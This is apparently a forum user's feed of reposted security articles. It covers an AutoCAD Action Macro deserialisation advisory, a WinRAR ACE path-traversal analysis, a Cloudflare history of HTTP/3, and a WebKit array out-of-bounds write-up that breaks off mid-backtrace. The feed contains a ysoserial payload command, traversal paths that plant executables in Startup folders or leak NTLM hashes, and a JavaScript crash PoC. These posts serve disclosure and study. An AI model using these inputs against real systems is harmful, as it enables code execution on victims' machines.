-
Posts
18740 -
Joined
-
Last visited
-
Days Won
711
Everything posted by Nytro
-
AutoCad .NET Deserialisation Vulnerability Product AutoCad Severity Medium CVE Reference CVE-2019-7361 Type Code Execution Description The Action Macro functionality of AutoDesk’s AutoCad software suite is vulnerable to code execution due to improper validation of user input passed to a deserialization call. AutoCad provides the ability to automate a set of tasks by recording the user performing those tasks and replaying them later. This functionality is called Action Macros. Before playing an Action Macro, the list of actions performed are presented to the user, as shown in the next figure. This recording will create a number of “DONUT” objects within the current drawing. Once an Action Macro has been recorded, it is saved to the user’s “Actions” directory as a .actm file. A snippet of the underlying data of the Action Macro file for the above recording is shown below: This data is made up of a number of .NET serialized objects. Highlighted in red is the length of the first object (of type AutoDesk.AutoCad.MacroRecorder.MacroNode). The green outline highlights the actual object, and the blue is the beginning of the next object. It should be noted that this data is deserialized to allow the user to view the tree of actions within a recording prior to the user clicking “play”. The vulnerability ultimately lies in AcMR.dll, specifically the method AutoDesk.AutoCad.MacroRecorder.BaseNode.Load: public static INode Load(Stream stream) { if (!DebugUtil.Verify(stream != null)) return (INode) null; object obj = MacroManager.Formatter.Deserialize(stream); (2) if (DebugUtil.Verify(obj is INode)) (3) return obj as INode; return (INode) null; } public void Save(Stream stream) { if (!DebugUtil.Verify(stream != null)) return; MacroManager.Formatter.Serialize(stream, (object) this); (1) } At (1) the object is saved using MacroManager.Formatter’s Serialize method – this occurs when an Action Macro is saved. At (2), the user input stream is Deserialized prior to being checked as a valid Inode object at (3). These actions occur when the Action Macro is loaded into memory. The MacroManager.Formatter.Deserialize method is a wrapper to the .NET BinaryFormatter function: public static IFormatter Formatter { get { if (MacroManager.m_formatter == null) { MacroManager.m_formatter = (IFormatter) new BinaryFormatter(); MacroManager.m_formatter.Binder = (SerializationBinder) new MacroManager.TypeRedirectionBinder(); } return MacroManager.m_formatter; } } A malicious user is able to gain code execution by replacing legitimate serialized objects in an Action Macro file. As a proof of concept, the ysoserial.net tool was used to generate a series of .NET gadgets that, when deserialised, would cause a calculator to be opened. The command used for this proof of concept was: ysoserial.exe -o raw -g TypeConfuseDelegate -c "calc.exe" -f BinaryFormatter > poc_calc_action_macro.actm Code execution occurs when a user attempts to view the actions within an Action Macro, this occurs directly prior to replaying it, as demonstrated in the next figure. Note that the Action Macro is never “played”. Impact This vulnerability is of medium risk to end users. Code execution occurs in the context of the current user, no extra privileges are gained. The potential attack vector could be through phishing of end users, whereby they are coerced into playing malicious Action Macros believing them to be legitimate. The most likely scenario could involve a malicious actor sharing an ActionMacro file online that supposedly solves a community problem. Solution As of February 1st 2019 AutoDesk have released a patch migitating this vulnerability. Users are advised to update AutoCad to the most recent version available. AutoDesk have also produced following advisory pertaining to this vulnerability as well as a number of others [2]. References [1] ysoserial.net - https://github.com/pwntester/ysoserial.net/tree/master/ysoserial [2] AutoDesk Advisory - https://www.autodesk.com/trust/security-advisories/adsk-sa-2019-0001 Sursa: https://labs.mwrinfosecurity.com/advisories/autocad-net-deserialisation-vulnerability/
-
- 1
-
-
Investigating WinRAR Code Execution Vulnerability (CVE-2018-20250) at Internet Scale Author adminPosted on February 22, 2019Categories Papers Authors: lywang, dannywei 0x00 Background As one of the most popular archiving software, WinRAR supports compress and decompress of multiple file archive formats. Check Point security researcher Nadav Grossman recently discovered a series of security vulnerabilities he found in WinRAR, with most powerful one being a remote code execution vulnerability in ACE archive decompression module (CVE-2018-20250). To support decompression of ACE archives, WinRAR integrated a 19-year-old dynamic link library unacev2.dll, which never updated since 2006, nor does it enable any kind of exploit mitigation technologies. Nadav Grossman uncovered a dictionary traversal bug in unacev2.dll, which could allow an attacker to execute arbitrary code or leak Net-NTLM hashes. 0x01 Description ACE archive decompression module unacev2.dll fails to properly filter relative paths when validating target path. Attacker can trick the program to directly use a relative path as target path. By placing malicious executable in system startup folder, it can lead to arbitrary code execution. 0x02 Root Cause unacev2.dll validates destination path before extracting files from ACE archives. It gets file_relative_path from archive file and use GetDevicePathLen(file_relative_path) to validate the path. The path concatenation is performed according to return value of the function, as shown in following diagram: (Source: https://research.checkpoint.com/extracting-code-execution-from-winrar/) When GetDevicePathLen(file_relative_path) returns 0, it will concatenate target path with relative path in archive to form a final path: sprintf(final_file_path, "%s%s", destination_folder, file_relative_path); Otherwise, it directly uses relative path as the final path: sprintf(final_file_path, "%s%s", "", file_relative_path); if an attacker can craft a malicious relative path that can bypass multiple filter and validation functions such as StateCallbackProc(), unacev2.dll!CleanPath(), and make unacev2.dll!GetDevicePathLen(file_relative_path) return a non-zero value, the malicious relative path will be used as final path for decompression. Nadav Grossman successfully crafted two such paths: # Malicious Path Final Path 1 C:\C:\some_folder\some_file.ext C:\some_folder\some_file.ext 2 C:\\10.10.10.10\smb_folder_name\some_folder\some_file.ext \10.10.10.10\smb_folder_name\some_folder\some_file.ext Variation 1: Attacker can place a file at arbitrary path on victim’s computer. Variation 2: Attacker can steal victim’s Net-NTLM hash. Attacker can then perform a NTLM relay attack to execute code on victim’s computer. It is worth mentioning that WinRAR runs at normal user privilege. Therefore, an attacker cannot place a file in the common startup folder (“C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup”). Placing a file in user startup folder (“C:\Users\<user name>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup”) requires guessing or brute-forcing a valid user name. However, in most common scenarios, where victims download archive file to Desktop (C:\Users\<user name>\Desktop) or Downloads (C:\Users\<user name>\Downloads) folder then extract the archive file in-place, the working directory of WinRAR is the same as the archive file. By using directory traversal, attacker can release payload to Startup folder without guessing a user name. Nadav Grossman crafted the following path to build a remote code execution exploit: "C:../AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\some_file.exe" 0x03 Affected Software As a shared library, unacev2.dll is also used by other software that supports ACE file decompression. These software are also affected by this vulnerability. Our Project A’Tuin system scans software at internet scale. We scanned through all software that used this shared library. The following diagram shows the version distribution of this library: Project A’Tuin can also traces shared libraries back to their dependent software. We currently observe that 15 Chinese software and 24 non-Chinese software are affected. Most of them can be categorized as utility software. Among them there are at least 9 file archivers, and 8 file explorer / commanders. Many other software seems to simply include unacev2.dll module as part of WinRAR package, for its own file decompression usage. 0x04 Mitigations WinRAR released version 5.70 Beta 1 to patch this vulnerability. Since the vendor of unacev2.dll was out of business in August 2017 and it is a closed source product, WinRAR decided to remove ACE decompression feature from WinRAR entirely. 360Zip has also patched this vulnerability by removing unacev2.dll. For users of other affected products, we suggest contacting the vendor for updated versions. If no updated version is available, users can temporarily work around this vulnerability by removing unacev2.dll from installation directory. 0x05 References [1] Extracting a 19 Year Old Code Execution from WinRAR https://research.checkpoint.com/extracting-code-execution-from-winrar/ [2] ACE (compressed file format) https://en.wikipedia.org/wiki/ACE_(compressed_file_format) Sursa: https://xlab.tencent.com/en/2019/02/22/investigating-winrar-code-execution-vulnerability-cve-2018-20250-at-internet-scale/
-
HTTP/3: From root to tip 24 Jan 2019 by Lucas Pardue. HTTP is the application protocol that powers the Web. It began life as the so-called HTTP/0.9 protocol in 1991, and by 1999 had evolved to HTTP/1.1, which was standardised within the IETF (Internet Engineering Task Force). HTTP/1.1 was good enough for a long time but the ever changing needs of the Web called for a better suited protocol, and HTTP/2 emerged in 2015. More recently it was announced that the IETF is intending to deliver a new version - HTTP/3. To some people this is a surprise and has caused a bit of confusion. If you don't track IETF work closely it might seem that HTTP/3 has come out of the blue. However, we can trace its origins through a lineage of experiments and evolution of Web protocols; specifically the QUIC transport protocol. If you're not familiar with QUIC, my colleagues have done a great job of tackling different angles. John's blog describes some of the real-world annoyances of today's HTTP, Alessandro's blog tackles the nitty-gritty transport layer details, and Nick's blog covers how to get hands on with some testing. We've collected these and more at https://cloudflare-quic.com. And if that tickles your fancy, be sure to check out quiche, our own open-source implementation of the QUIC protocol written in Rust. HTTP/3 is the HTTP application mapping to the QUIC transport layer. This name was made official in the recent draft version 17 (draft-ietf-quic-http-17), which was proposed in late October 2018, with discussion and rough consensus being formed during the IETF 103 meeting in Bangkok in November. HTTP/3 was previously known as HTTP over QUIC, which itself was previously known as HTTP/2 over QUIC. Before that we had HTTP/2 over gQUIC, and way back we had SPDY over gQUIC. The fact of the matter, however, is that HTTP/3 is just a new HTTP syntax that works on IETF QUIC, a UDP-based multiplexed and secure transport. In this blog post we'll explore the history behind some of HTTP/3's previous names and present the motivation behind the most recent name change. We'll go back to the early days of HTTP and touch on all the good work that has happened along the way. If you're keen to get the full picture you can jump to the end of the article or open this highly detailed SVG version. An HTTP/3 layer cake Setting the scene Just before we focus on HTTP, it is worth reminding ourselves that there are two protocols that share the name QUIC. As we explained previously, gQUIC is commonly used to identify Google QUIC (the original protocol), and QUIC is commonly used to represent the IETF standard-in-progress version that diverges from gQUIC. Since its early days in the 90s, the web’s needs have changed. We've had new versions of HTTP and added user security in the shape of Transport Layer Security (TLS). We'll only touch on TLS in this post, our other blog posts are a great resource if you want to explore that area in more detail. To help me explain the history of HTTP and TLS, I started to collate details of protocol specifications and dates. This information is usually presented in a textual form such as a list of bullets points stating document titles, ordered by date. However, there are branching standards, each overlapping in time and a simple list cannot express the real complexity of relationships. In HTTP, there has been parallel work that refactors core protocol definitions for easier consumption, extends the protocol for new uses, and redefines how the protocol exchanges data over the Internet for performance. When you're trying to join the dots over nearly 30 years of Internet history across different branching work streams you need a visualisation. So I made one - the Cloudflare Secure Web Timeline. (NB: Technically it is a Cladogram, but the term timeline is more widely known). I have applied some artistic license when creating this, choosing to focus on the successful branches in the IETF space. Some of the things not shown include efforts in the W3 Consortium HTTP-NG working group, along with some exotic ideas that their authors are keen on explaining how to pronounce: HMURR (pronounced 'hammer') and WAKA (pronounced “wah-kah”). In the next few sections I'll walk this timeline to explain critical chapters in the history of HTTP. To enjoy the takeaways from this post, it helps to have an appreciation of why standardisation is beneficial, and how the IETF approaches it. Therefore we'll start with a very brief overview of that topic before returning to the timeline itself. Feel free to skip the next section if you are already familiar with the IETF. Types of Internet standard Generally, standards define common terms of reference, scope, constraint, applicability, and other considerations. Standards exist in many shapes and sizes, and can be informal (aka de facto) or formal (agreed/published by a Standards Defining Organisation such as IETF, ISO or MPEG). Standards are used in many fields, there is even a formal British Standard for making tea - BS 6008. The early Web used HTTP and SSL protocol definitions that were published outside the IETF, these are marked as red lines on the Secure Web Timeline. The uptake of these protocols by clients and servers made them de facto standards. At some point, it was decided to formalise these protocols (some motivating reasons are described in a later section). Internet standards are commonly defined in the IETF, which is guided by the informal principle of "rough consensus and running code". This is grounded in experience of developing and deploying things on the Internet. This is in contrast to a "clean room" approach of trying to develop perfect protocols in a vacuum. IETF Internet standards are commonly known as RFCs. This is a complex area to explain so I recommend reading the blog post "How to Read an RFC" by the QUIC Working Group Co-chair Mark Nottingham. A Working Group, or WG, is more or less just a mailing list. Each year the IETF hold three meetings that provide the time and facilities for all WGs to meet in person if they wish. The agenda for these weeks can become very congested, with limited time available to discuss highly technical areas in depth. To overcome this, some WGs choose to also hold interim meetings in the months between the the general IETF meetings. This can help to maintain momentum on specification development. The QUIC WG has held several interim meetings since 2017, a full list is available on their meeting page. These IETF meetings also provide the opportunity for other IETF-related collections of people to meet, such as the Internet Architecture Board or Internet Research Task Force. In recent years, an IETF Hackathon has been held during the weekend preceding the IETF meeting. This provides an opportunity for the community to develop running code and, importantly, to carry out interoperability testing in the same room with others. This helps to find issues in specifications that can be discussed in the following days. For the purposes of this blog, the important thing to understand is that RFCs don't just spring into existence. Instead, they go through a process that usually starts with an IETF Internet Draft (I-D) format that is submitted for consideration of adoption. In the case where there is already a published specification, preparation of an I-D might just be a simple reformatting exercise. I-Ds have a 6 month active lifetime from the date of publish. To keep them active, new versions need to be published. In practice, there is not much consequence to letting an I-D elapse and it happens quite often. The documents continue to be hosted on the IETF document’s website for anyone that wants to read them. I-Ds are represented on the Secure Web Timeline as purple lines. Each one has a unique name that takes the form of draft-{author name}-{working group}-{topic}-{version}. The working group field is optional, it might predict IETF WG that will work on the piece and sometimes this changes. If an I-D is adopted by the IETF, or if the I-D was initiated directly within the IETF, the name is draft-ietf-{working group}-{topic}-{version}. I-Ds may branch, merge or die on the vine. The version starts at 00 and increases by 1 each time a new draft is released. For example, the 4th draft of an I-D will have the version 03. Any time that an I-D changes name, its version resets back to 00. It is important to note that anyone can submit an I-D to the IETF; you should not consider these as standards. But, if the IETF standardisation process of an I-D does reach consensus, and the final document passes review, we finally get an RFC. The name changes again at this stage. Each RFC gets a unique number e.g. RFC 7230. These are represented as blue lines on the Secure Web Timeline. RFCs are immutable documents. This means that changes to the RFC require a completely new number. Changes might be done in order to incorporate fixes for errata (editorial or technical errors that were found and reported) or simply to refactor the specification to improve layout. RFCs may obsolete older versions (complete replacement), or just update them (substantively change). All IETF documents are openly available on http://tools.ietf.org. Personally I find the IETF Datatracker a little more user friendly because it provides a visualisation of a documents progress from I-D to RFC. Below is an example that shows the development of RFC 1945 - HTTP/1.0 and it is a clear source of inspiration for the Secure Web Timeline. IETF Datatracker view of RFC 1945 Interestingly, in the course of my work I found that the above visualisation is incorrect. It is missing draft-ietf-http-v10-spec-05 for some reason. Since the I-D lifetime is 6 months, there appears to be a gap before it became an RFC, whereas in reality draft 05 was still active through until August 1996. Exploring the Secure Web Timeline With a small appreciation of how Internet standards documents come to fruition, we can start to walk the the Secure Web Timeline. In this section are a number of excerpt diagrams that show an important part of the timeline. Each dot represents the date that a document or capability was made available. For IETF documents, draft numbers are omitted for clarity. However, if you want to see all that detail please check out the complete timeline. HTTP began life as the so-called HTTP/0.9 protocol in 1991, and in 1994 the I-D draft-fielding-http-spec-00 was published. This was adopted by the IETF soon after, causing the name change to draft-ietf-http-v10-spec-00. The I-D went through 6 draft versions before being published as RFC 1945 - HTTP/1.0 in 1996. However, even before the HTTP/1.0 work completed, a separate activity started on HTTP/1.1. The I-D draft-ietf-http-v11-spec-00 was published in November 1995 and was formally published as RFC 2068 in 1997. The keen eyed will spot that the Secure Web Timeline doesn't quite capture that sequence of events, this is an unfortunate side effect of the tooling used to generate the visualisation. I tried to minimise such problems where possible. An HTTP/1.1 revision exercise was started in mid-1997 in the form of draft-ietf-http-v11-spec-rev-00. This completed in 1999 with the publication of RFC 2616. Things went quiet in the IETF HTTP world until 2007. We'll come back to that shortly. A History of SSL and TLS Switching tracks to SSL. We see that the SSL 2.0 specification was released sometime around 1995, and that SSL 3.0 was released in November 1996. Interestingly, SSL 3.0 is described by RFC 6101, which was released in August 2011. This sits in Historic category, which "is usually done to document ideas that were considered and discarded, or protocols that were already historic when it was decided to document them." according to the IETF. In this case it is advantageous to have an IETF-owned document that describes SSL 3.0 because it can be used as a canonical reference elsewhere. Of more interest to us is how SSL inspired the development of TLS, which began life as draft-ietf-tls-protocol-00 in November 1996. This went through 6 draft versions and was published as RFC 2246 - TLS 1.0 at the start of 1999. Between 1995 and 1999, the SSL and TLS protocols were used to secure HTTP communications on the Internet. This worked just fine as a de facto standard. It wasn't until January 1998 that the formal standardisation process for HTTPS was started with the publication of I-D draft-ietf-tls-https-00. That work concluded in May 2000 with the publication of RFC 2616 - HTTP over TLS. TLS continued to evolve between 2000 and 2007, with the standardisation of TLS 1.1 and 1.2. There was a gap of 7 years until work began on the next version of TLS, which was adopted as draft-ietf-tls-tls13-00 in April 2014 and, after 28 drafts, completed as RFC 8446 - TLS 1.3 in August 2018. Internet standardisation process After taking a small look at the timeline, I hope you can build a sense of how the IETF works. One generalisation for the way that Internet standards take shape is that researchers or engineers design experimental protocols that suit their specific use case. They experiment with protocols, in public or private, at various levels of scale. The data helps to identify improvements or issues. The work may be published to explain the experiment, to gather wider input or to help find other implementers. Take up of this early work by others may make it a de facto standard; eventually there may be sufficient momentum that formal standardisation becomes an option. The status of a protocol can be an important consideration for organisations that may be thinking about implementing, deploying or in some way using it. A formal standardisation process can make a de facto standard more attractive because it tends to provide stability. The stewardship and guidance is provided by an organisation, such as the IETF, that reflects a wider range of experiences. However, it is worth highlighting that not all all formal standards succeed. The process of creating a final standard is almost as important as the standard itself. Taking an initial idea and inviting contribution from people with wider knowledge, experience and use cases can to help produce something that will be of more use to a wider population. However, the standardisation process is not always easy. There are pitfalls and hurdles. Sometimes the process takes so long that the output is no longer relevant. Each Standards Defining Organisation tends to have its own process that is geared around its field and participants. Explaining all of the details about how the IETF works is well beyond the scope of this blog. The IETF's "How we work" page is an excellent starting point that covers many aspects. The best method to forming understanding, as usual, is to get involved yourself. This can be as easy as joining an email list or adding to discussion on a relevant GitHub repository. Cloudflare's running code Cloudflare is proud to be early an adopter of new and evolving protocols. We have a long record of adopting new standards early, such as HTTP/2. We also test features that are experimental or yet to be final, like TLS 1.3 and SPDY. In relation to the IETF standardisation process, deploying this running code on real networks across a diverse body of websites helps us understand how well the protocol will work in practice. We combine our existing expertise with experimental information to help improve the running code and, where it makes sense, feedback issues or improvements to the WG that is standardising a protocol. Testing new things is not the only priority. Part of being an innovator is knowing when it is time to move forward and put older innovations in the rear view mirror. Sometimes this relates to security-oriented protocols, for example, Cloudflare disabled SSLv3 by default due of the POODLE vulnerability. In other cases, protocols become superseded by a more technologically advanced one; Cloudflare deprecated SPDY support in favour of HTTP/2. The introduction and deprecation of relevant protocols are represented on the Secure Web Timeline as orange lines. Dotted vertical lines help correlate Cloudflare events to relevant IETF documents. For example, Cloudflare introduced TLS 1.3 support in September 2016, with the final document, RFC 8446, being published almost two years later in August 2018. Refactoring in HTTPbis HTTP/1.1 is a very successful protocol and the timeline shows that there wasn't much activity in the IETF after 1999. However, the true reflection is that years of active use gave implementation experience that unearthed latent issues with RFC 2616, which caused some interoperability issues. Furthermore, the protocol was extended by other RFCs like 2817 and 2818. It was decided in 2007 to kickstart a new activity to improve the HTTP protocol specification. This was called HTTPbis (where "bis" stems from Latin meaning "two", "twice" or "repeat") and it took the form of a new Working Group. The original charter does a good job of describing the problems that were trying to be solved. In short, HTTPbis decided to refactor RFC 2616. It would incorporate errata fixes and buy in some aspects of other specifications that had been published in the meantime. It was decided to split the document up into parts. This resulted in 6 I-Ds published in December 2007: draft-ietf-httpbis-p1-messaging draft-ietf-httpbis-p2-semantics draft-ietf-httpbis-p4-conditional draft-ietf-httpbis-p5-range draft-ietf-httpbis-p6-cache draft-ietf-httpbis-p7-auth The diagram shows how this work progressed through a lengthy drafting process of 7 years, with 27 draft versions being released, before final standardisation. In June 2014, the so-called RFC 723x series was released (where x ranges from 0 to 5). The Chair of the HTTPbis WG celebrated this achievement with the acclimation "RFC2616 is Dead". If it wasn't clear, these new documents obsoleted the older RFC 2616. What does any of this have to do with HTTP/3? While the IETF was busy working on the RFC 723x series the world didn't stop. People continued to enhance, extend and experiment with HTTP on the Internet. Among them were Google, who had started to experiment with something called SPDY (pronounced speedy). This protocol was touted as improving the performance of web browsing, a principle use case for HTTP. At the end of 2009 SPDY v1 was announced, and it was quickly followed by SPDY v2 in 2010. I want to avoid going into the technical details of SPDY. That's a topic for another day. What is important, is to understand that SPDY took the core paradigms of HTTP and modified the interchange format slightly in order to gain improvements. With hindsight, we can see that HTTP has clearly delimited semantics and syntax. Semantics describe the concept of request and response exchanges including: methods, status codes, header fields (metadata) and bodies (payload). Syntax describe how to map semantics to bytes on the wire. HTTP/0.9, 1.0 and 1.1 share many semantics. They also share syntax in the form of character strings that are sent over TCP connections. SPDY took HTTP/1.1 semantics and changed the syntax from strings to binary. This is a really interesting topic but we will go no further down that rabbit hole today. Google's experiments with SPDY showed that there was promise in changing HTTP syntax, and value in keeping the existing HTTP semantics. For example, keeping the format of URLs to use https:// avoided many problems that could have affected adoption. Having seen some of the positive outcomes, the IETF decided it was time to consider what HTTP/2.0 might look like. The slides from the HTTPbis session held during IETF 83 in March 2012 show the requirements, goals and measures of success that were set out. It is also clearly states that "HTTP/2.0 only signifies that the wire format isn't compatible with that of HTTP/1.x". During that meeting the community was invited to share proposals. I-Ds that were submitted for consideration included draft-mbelshe-httpbis-spdy-00, draft-montenegro-httpbis-speed-mobility-00 and draft-tarreau-httpbis-network-friendly-00. Ultimately, the SPDY draft was adopted and in November 2012 work began on draft-ietf-httpbis-http2-00. After 18 drafts across a period of just over 2 years, RFC 7540 - HTTP/2 was published in 2015. During this specification period, the precise syntax of HTTP/2 diverged just enough to make HTTP/2 and SPDY incompatible. These years were a very busy period for the HTTP-related work at the IETF, with the HTTP/1.1 refactor and HTTP/2 standardisation taking place in parallel. This is in stark contrast to the many years of quiet in the early 2000s. Be sure to check out the full timeline to really appreciate the amount of work that took place. Although HTTP/2 was in the process of being standardised, there was still benefit to be had from using and experimenting with SPDY. Cloudflare introduced support for SPDY in August 2012 and only deprecated it in February 2018 when our statistics showed that less than 4% of Web clients continued to want SPDY. Meanwhile, we introduced HTTP/2 support in December 2015, not long after the RFC was published, when our analysis indicated that a meaningful proportion of Web clients could take advantage of it. Web client support of the SPDY and HTTP/2 protocols preferred the secure option of using TLS. The introduction of Universal SSL in September 2014 helped ensure that all websites signed up to Cloudflare were able to take advantage of these new protocols as we introduced them. gQUIC Google continued to experiment between 2012 and 2015 they released SPDY v3 and v3.1. They also started working on gQUIC (pronounced, at the time, as quick) and the initial public specification was made available in early 2012. The early versions of gQUIC made use of the SPDY v3 form of HTTP syntax. This choice made sense because HTTP/2 was not yet finished. The SPDY binary syntax was packaged into QUIC packets that could sent in UDP datagrams. This was a departure from the TCP transport that HTTP traditionally relied on. When stacked up all together this looked like: SPDY over gQUIC layer cake gQUIC used clever tricks to achieve performance. One of these was to break the clear layering between application and transport. What this meant in practice was that gQUIC only ever supported HTTP. So much so that gQUIC, termed "QUIC" at the time, was synonymous with being the next candidate version of HTTP. Despite the continued changes to QUIC over the last few years, which we'll touch on momentarily, to this day, the term QUIC is understood by people to mean that initial HTTP-only variant. Unfortunately this is a regular source of confusion when discussing the protocol. gQUIC continued to experiment and eventually switched over to a syntax much closer to HTTP/2. So close in fact that most people simply called it "HTTP/2 over QUIC". However, because of technical constraints there were some very subtle differences. One example relates to how the HTTP headers were serialized and exchanged. It is a minor difference but in effect means that HTTP/2 over gQUIC was incompatible with the IETF's HTTP/2. Last but not least, we always need to consider the security aspects of Internet protocols. gQUIC opted not to use TLS to provide security. Instead Google developed a different approach called QUIC Crypto. One of the interesting aspects of this was a new method for speeding up security handshakes. A client that had previously established a secure session with a server could reuse information to do a "zero round-trip time", or 0-RTT, handshake. 0-RTT was later incorporated into TLS 1.3. Are we at the point where you can tell me what HTTP/3 is yet? Almost. By now you should be familiar with how standardisation works and gQUIC is not much different. There was sufficient interest that the Google specifications were written up in I-D format. In June 2015 draft-tsvwg-quic-protocol-00, entitled "QUIC: A UDP-based Secure and Reliable Transport for HTTP/2" was submitted. Keep in mind my earlier statement that the syntax was almost-HTTP/2. Google announced that a Bar BoF would be held at IETF 93 in Prague. For those curious about what a "Bar BoF" is, please consult RFC 6771. Hint: BoF stands for Birds of a Feather. The outcome of this engagement with the IETF was, in a nutshell, that QUIC seemed to offer many advantages at the transport layer and that it should be decoupled from HTTP. The clear separation between layers should be re-introduced. Furthermore, there was a preference for returning back to a TLS-based handshake (which wasn't so bad since TLS 1.3 was underway at this stage, and it was incorporating 0-RTT handshakes). About a year later, in 2016, a new set of I-Ds were submitted: draft-hamilton-quic-transport-protocol-00 draft-thomson-quic-tls-00 draft-iyengar-quic-loss-recovery-00 draft-shade-quic-http2-mapping-00 Here's where another source of confusion about HTTP and QUIC enters the fray. draft-shade-quic-http2-mapping-00 is entitled "HTTP/2 Semantics Using The QUIC Transport Protocol" and it describes itself as "a mapping of HTTP/2 semantics over QUIC". However, this is a misnomer. HTTP/2 was about changing syntax while maintaining semantics. Furthermore, "HTTP/2 over gQUIC" was never an accurate description of the syntax either, for the reasons I outlined earlier. Hold that thought. This IETF version of QUIC was to be an entirely new transport protocol. That's a large undertaking and before diving head-first into such commitments, the IETF likes to gauge actual interest from its members. To do this, a formal Birds of a Feather meeting was held at the IETF 96 meeting in Berlin in 2016. I was lucky enough to attend the session in person and the slides don't give it justice. The meeting was attended by hundreds, as shown by Adam Roach's photograph. At the end of the session consensus was reached; QUIC would be adopted and standardised at the IETF. The first IETF QUIC I-D for mapping HTTP to QUIC, draft-ietf-quic-http-00, took the Ronseal approach and simplified its name to "HTTP over QUIC". Unfortunately, it didn't finish the job completely and there were many instances of the term HTTP/2 throughout the body. Mike Bishop, the I-Ds new editor, identified this and started to fix the HTTP/2 misnomer. In the 01 draft, the description changed to "a mapping of HTTP semantics over QUIC". Gradually, over time and versions, the use of the term "HTTP/2" decreased and the instances became mere references to parts of RFC 7540. Roll forward two years to October 2018 and the I-D is now at version 16. While HTTP over QUIC bares similarity to HTTP/2 it ultimately is an independent, non-backwards compatible HTTP syntax. However, to those that don't track IETF development very closely (a very very large percentage of the Earth's population), the document name doesn't capture this difference. One of the main points of standardisation is to aid communication and interoperability. Yet a simple thing like naming is a major contributor to confusion in the community. Recall what was said in 2012, "HTTP/2.0 only signifies that the wire format isn't compatible with that of HTTP/1.x". The IETF followed that existing cue. After much deliberation in the lead up to, and during, IETF 103, consensus was reached to rename "HTTP over QUIC" to HTTP/3. The world is now in a better place and we can move on to more important debates. But RFC 7230 and 7231 disagree with your definition of semantics and syntax! Sometimes document titles can be confusing. The present HTTP documents that describe syntax and semantics are: RFC 7230 - Hypertext Transfer Protocol (HTTP/1.1): Message Syntax and Routing RFC 7231 - Hypertext Transfer Protocol (HTTP/1.1): Semantics and Content It is possible to read too much into these names and believe that fundamental HTTP semantics are specific for versions of HTTP i.e. HTTP/1.1. However, this is an unintended side effect of the HTTP family tree. The good news is that the HTTPbis Working Group are trying to address this. Some brave members are going through another round of document revision, as Roy Fielding put it, "one more time!". This work is underway right now and is known as the HTTP Core activity (you may also have heard of this under the moniker HTTPtre or HTTPter; naming things is hard). This will condense the six drafts down to three: HTTP Semantics (draft-ietf-httpbis-semantics) HTTP Caching (draft-ietf-httpbis-caching) HTTP/1.1 Message Syntax and Routing (draft-ietf-httpbis-messaging) Under this new structure, it becomes more evident that HTTP/2 and HTTP/3 are syntax definitions for the common HTTP semantics. This doesn't mean they don't have their own features beyond syntax but it should help frame discussion going forward. Pulling it all together This blog post has taken a shallow look at the standardisation process for HTTP in the IETF across the last three decades. Without touching on many technical details, I've tried to explain how we have ended up with HTTP/3 today. If you skipped the good bits in the middle and are looking for a one liner here it is: HTTP/3 is just a new HTTP syntax that works on IETF QUIC, a UDP-based multiplexed and secure transport. There are many interesting technical areas to explore further but that will have to wait for another day. In the course of this post, we explored important chapters in the development of HTTP and TLS but did so in isolation. We close out the blog by pulling them all together into the complete Secure Web Timeline presented below. You can use this to investigate the detailed history at your own comfort. And for the super sleuths, be sure to check out the full version including draft numbers. Tagged with IETF, QUIC, TLS, Security Sursa: https://blog.cloudflare.com/http-3-from-root-to-tip/
-
CVE-2018-4441: OOB R/W via JSArray::unshiftCountWithArrayStorage (WebKit) Feb 15, 2019 In this write-up, we’ll be going through the ins and outs of CVE-2018-4441, which was reported by lokihardt of Google Project Zero. Overview bool JSArray::shiftCountWithArrayStorage(VM& vm, unsigned startIndex, unsigned count, ArrayStorage* storage) { unsigned oldLength = storage->length(); RELEASE_ASSERT(count <= oldLength); // If the array contains holes or is otherwise in an abnormal state, // use the generic algorithm in ArrayPrototype. if ((storage->hasHoles() && this->structure(vm)->holesMustForwardToPrototype(vm, this)) || hasSparseMap() || shouldUseSlowPut(indexingType())) { return false; } if (!oldLength) return true; unsigned length = oldLength - count; storage->m_numValuesInVector -= count; storage->setLength(length); // [...] Considering the comment, I think the method is supposed to prevent an array with holes from going through to the code “storage->m_numValuesInVector -= count”. But that kind of arrays actually can get there by only having the holesMustForwardToPrototype method return false. Unless the array has any indexed accessors on it or Proxy objects in the prototype chain, the method will just return false. So “storage->m_numValuesInVector” can be controlled by the user. In the PoC, it changes m_numValuesInVector to 0xfffffff0 that equals to the new length, making the hasHoles method return false, leading to OOB reads/writes in the JSArray::unshiftCountWithArrayStorage method. PoC function main() { // [1] let arr = [1]; // [2] arr.length = 0x100000; // [3] arr.splice(0, 0x11); // [4] arr.length = 0xfffffff0; // [5] arr.splice(0xfffffff0, 0, 1); } main(); Root Cause Analysis Running the PoC inside a debugger we see that the binary crashes while trying to write in non-writable memory (EXC_BAD_ACCESS😞 (lldb) r Process 3018 launched: './jsc' (x86_64) Process 3018 stopped * thread #1, queue = 'com.apple.main-thread', stop reason = EXC_BAD_ACCESS (code=2, address=0x18000fe638) frame #0: 0x0000000100af8cd3 JavaScriptCore`JSC::JSArray::unshiftCountWithArrayStorage(JSC::ExecState*, unsigned int, unsigned int, JSC::ArrayStorage*) + 675 JavaScriptCore`JSC::JSArray::unshiftCountWithArrayStorage: -> 0x100af8cd3 <+675>: movq $0x0, 0x10(%r13,%rdi,8) 0x100af8cdc <+684>: incq %rcx 0x100af8cdf <+687>: incq %rdx 0x100af8ce2 <+690>: jne 0x100af8cd0 ; <+672> Target 0: (jsc) stopped. (lldb) p/x $r13 (unsigned long) $4 = 0x00000010000fe6a8 (lldb) p/x $rdi (unsigned long) $5 = 0x00000000fffffff0 (lldb) memory region $r13+($rdi*8) [0x00000017fa800000-0x0000001802800000) --- (lldb) bt * thread #1, queue = 'com.apple.main-thread', stop reason = EXC_BAD_ACCESS (code=2, address=0x18000fe638) * frame #0: 0x0000000100af8cd3 JavaScriptCore`JSC::JSArray::unshiftCountWithArrayStorage(JSC::ExecState*, unsigned int, unsigned int, JSC::ArrayStorage*) + 675 frame #1: 0x0000000100af8fc7 JavaScriptCore`JSC::JSArray::unshiftCountWithAnyIndexingType(JSC::ExecState*, unsigned int, unsigned int) + 215 frame #2: 0x0000000100a6a1d5 JavaScriptCore`void JSC::unshift<(JSC::JSArray::ShiftCountMode)1>(JSC::ExecState*, JSC::JSObject*, unsigned int, unsigned int, unsigned int, unsigned int) + 181 frame #3: 